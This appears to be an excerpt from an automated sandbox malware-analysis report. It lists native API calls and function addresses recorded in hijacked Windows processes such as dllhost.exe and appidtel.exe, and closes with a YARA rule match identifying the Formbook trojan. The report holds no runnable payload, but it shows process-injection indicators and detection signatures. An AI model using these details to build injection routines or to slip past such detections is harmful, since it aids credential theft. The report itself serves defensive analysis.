              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852C60 NtCreateKey,LdrInitializeThunk,11_2_03852C60
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03852C70
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03853090 NtSetValueKey,11_2_03853090
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03853010 NtOpenDirectoryObject,11_2_03853010
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852B80 NtQueryInformationFile,11_2_03852B80
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852BA0 NtEnumerateValueKey,11_2_03852BA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852BE0 NtQueryValueKey,11_2_03852BE0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852BF0 NtAllocateVirtualMemory,11_2_03852BF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852AB0 NtWaitForSingleObject,11_2_03852AB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852F90 NtProtectVirtualMemory,11_2_03852F90
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852FA0 NtQuerySection,11_2_03852FA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852F60 NtCreateProcessEx,11_2_03852F60
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852E80 NtReadVirtualMemory,11_2_03852E80
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852EA0 NtAdjustPrivilegesToken,11_2_03852EA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852E30 NtWriteVirtualMemory,11_2_03852E30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852DB0 NtEnumerateKey,11_2_03852DB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852D00 NtSetInformationFile,11_2_03852D00
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03853D10 NtOpenProcessToken,11_2_03853D10
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03853D70 NtOpenThread,11_2_03853D70
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852CC0 NtQueryVirtualMemory,11_2_03852CC0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852CF0 NtOpenProcess,11_2_03852CF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03852C00 NtQueryInformationProcess,11_2_03852C00
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030A9190 NtClose,11_2_030A9190
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030A90F0 NtDeleteFile,11_2_030A90F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030A8FF0 NtReadFile,11_2_030A8FF0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030A8E80 NtCreateFile,11_2_030A8E80
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347751FA4_2_00007FFD347751FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347729C54_2_00007FFD347729C5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347743114_2_00007FFD34774311
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347727454_2_00007FFD34772745
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34772ED34_2_00007FFD34772ED3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347767F34_2_00007FFD347767F3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34772BFB4_2_00007FFD34772BFB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347757B24_2_00007FFD347757B2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34842FC94_2_00007FFD34842FC9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_004182B35_2_004182B3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_004130235_2_00413023
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0042E8B35_2_0042E8B3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_004011C05_2_004011C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0040234D5_2_0040234D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_004023505_2_00402350
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0040FB835_2_0040FB83
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0041644C5_2_0041644C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0041648E5_2_0041648E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_004164935_2_00416493
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0040FDA35_2_0040FDA3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0040DE195_2_0040DE19
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0040DE235_2_0040DE23
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_00402E805_2_00402E80
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330132D5_2_0330132D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330A3525_2_0330A352
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323D34C5_2_0323D34C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0329739A5_2_0329739A
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325E3F05_2_0325E3F0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033103E65_2_033103E6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F02745_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032552A05_2_032552A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B2C05_2_0326B2C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D02C05_2_032D02C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032401005_2_03240100
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032EA1185_2_032EA118
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0328516C5_2_0328516C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F1725_2_0323F172
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0331B16B5_2_0331B16B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D81585_2_032D8158
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325B1B05_2_0325B1B0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033101AA5_2_033101AA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033081CC5_2_033081CC
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330F0E05_2_0330F0E0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033070E95_2_033070E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FF0CC5_2_032FF0CC
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032570C05_2_032570C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032507705_2_03250770
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032747505_2_03274750
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330F7B05_2_0330F7B0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324C7C05_2_0324C7C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326C6E05_2_0326C6E0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033016CC5_2_033016CC
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032505355_2_03250535
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033075715_2_03307571
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032ED5B05_2_032ED5B0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033105915_2_03310591
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330F43F5_2_0330F43F
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032414605_2_03241460
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033024465_2_03302446
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FE4F65_2_032FE4F6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330FB765_2_0330FB76
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330AB405_2_0330AB40
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326FB805_2_0326FB80
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0328DBF95_2_0328DBF9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C5BF05_2_032C5BF0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03306BD75_2_03306BD7
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C3A6C5_2_032C3A6C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03307A465_2_03307A46
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330FA495_2_0330FA49
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032EDAAC5_2_032EDAAC
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03295AA05_2_03295AA0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324EA805_2_0324EA80
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FDAC65_2_032FDAC6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032669625_2_03266962
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032599505_2_03259950
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B9505_2_0326B950
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032529A05_2_032529A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0331A9A65_2_0331A9A6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BD8005_2_032BD800
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032528405_2_03252840
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325A8405_2_0325A840
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032368B85_2_032368B8
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032538E05_2_032538E0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327E8F05_2_0327E8F0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03292F285_2_03292F28
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03270F305_2_03270F30
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330FF095_2_0330FF09
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C4F405_2_032C4F40
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330FFB15_2_0330FFB1
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CEFA05_2_032CEFA0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03251F925_2_03251F92
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325CFE05_2_0325CFE0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03242FC85_2_03242FC8
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03213FD25_2_03213FD2
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03213FD55_2_03213FD5
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330EE265_2_0330EE26
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250E595_2_03250E59
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03259EB05_2_03259EB0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330CE935_2_0330CE93
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03262E905_2_03262E90
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330EEDB5_2_0330EEDB
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325AD005_2_0325AD00
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03307D735_2_03307D73
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03253D405_2_03253D40
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03301D5A5_2_03301D5A
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03268DBF5_2_03268DBF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324ADE05_2_0324ADE0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326FDC05_2_0326FDC0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C9C325_2_032C9C32
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03250C005_2_03250C00
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0CB55_2_032F0CB5
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330FCF25_2_0330FCF2
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03240CF25_2_03240CF2
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_0304C31E10_2_0304C31E
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_03052BE710_2_03052BE7
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_0306B04E10_2_0306B04E
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_0304C53E10_2_0304C53E
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_0304A5B410_2_0304A5B4
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_0304A5BE10_2_0304A5BE
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_03052C2E10_2_03052C2E
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_03052C2910_2_03052C29
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0386739A11_2_0386739A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038E03E611_2_038E03E6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382E3F011_2_0382E3F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D132D11_2_038D132D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380D34C11_2_0380D34C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DA35211_2_038DA352
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038252A011_2_038252A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383B2C011_2_0383B2C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C12ED11_2_038C12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C027411_2_038C0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038E01AA11_2_038E01AA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B1B011_2_0382B1B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D81CC11_2_038D81CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381010011_2_03810100
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BA11811_2_038BA118
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038EB16B11_2_038EB16B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0385516C11_2_0385516C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380F17211_2_0380F172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CF0CC11_2_038CF0CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038270C011_2_038270C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D70E911_2_038D70E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DF0E011_2_038DF0E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DF7B011_2_038DF7B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381C7C011_2_0381C7C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0384475011_2_03844750
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382077011_2_03820770
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D16CC11_2_038D16CC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383C6E011_2_0383C6E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038E059111_2_038E0591
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BD5B011_2_038BD5B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382053511_2_03820535
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D757111_2_038D7571
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CE4F611_2_038CE4F6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DF43F11_2_038DF43F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D244611_2_038D2446
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381146011_2_03811460
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383FB8011_2_0383FB80
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D6BD711_2_038D6BD7
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0385DBF911_2_0385DBF9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DAB4011_2_038DAB40
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DFB7611_2_038DFB76
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381EA8011_2_0381EA80
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03865AA011_2_03865AA0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BDAAC11_2_038BDAAC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CDAC611_2_038CDAC6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DFA4911_2_038DFA49
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D7A4611_2_038D7A46
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03893A6C11_2_03893A6C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038229A011_2_038229A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038EA9A611_2_038EA9A6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382995011_2_03829950
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383B95011_2_0383B950
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383696211_2_03836962
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038068B811_2_038068B8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038238E011_2_038238E0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0384E8F011_2_0384E8F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382284011_2_03822840
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382A84011_2_0382A840
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03821F9211_2_03821F92
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DFFB111_2_038DFFB1
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03812FC811_2_03812FC8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382CFE011_2_0382CFE0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DFF0911_2_038DFF09
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03840F3011_2_03840F30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03894F4011_2_03894F40
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03832E9011_2_03832E90
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DCE9311_2_038DCE93
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03829EB011_2_03829EB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DEEDB11_2_038DEEDB
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DEE2611_2_038DEE26
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03820E5911_2_03820E59
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03838DBF11_2_03838DBF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383FDC011_2_0383FDC0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381ADE011_2_0381ADE0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382AD0011_2_0382AD00
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03823D4011_2_03823D40
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D1D5A11_2_038D1D5A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D7D7311_2_038D7D73
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C0CB511_2_038C0CB5
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03810CF211_2_03810CF2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038DFCF211_2_038DFCF2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03820C0011_2_03820C00
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03899C3211_2_03899C32
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03091B2011_2_03091B20
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0309335911_2_03093359
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0309339B11_2_0309339B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030933A011_2_030933A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030951C011_2_030951C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030AB7C011_2_030AB7C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0308CA9011_2_0308CA90
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0308AD2611_2_0308AD26
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0308AD3011_2_0308AD30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0308CCB011_2_0308CCB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0368E33811_2_0368E338
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0368E7ED11_2_0368E7ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0368E45311_2_0368E453
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0368CAE311_2_0368CAE3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0368D85811_2_0368D858
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_05461D5812_2_05461D58
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_0545FF3312_2_0545FF33
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_0545FF3812_2_0545FF38
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_0545962812_2_05459628
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_0545FEF112_2_0545FEF1
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_0545E6B812_2_0545E6B8
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_0545984812_2_05459848
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_054578C812_2_054578C8
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_054578BE12_2_054578BE
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 12_2_0547835812_2_05478358
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 0323B970 appears 268 times
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 03285130 appears 36 times
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 03297E54 appears 96 times
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 032CF290 appears 105 times
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: String function: 032BEA12 appears 86 times
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 0388EA12 appears 84 times
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 0380B970 appears 266 times
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 03867E54 appears 88 times
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 03855130 appears 36 times
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 0389F290 appears 105 times
              Source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
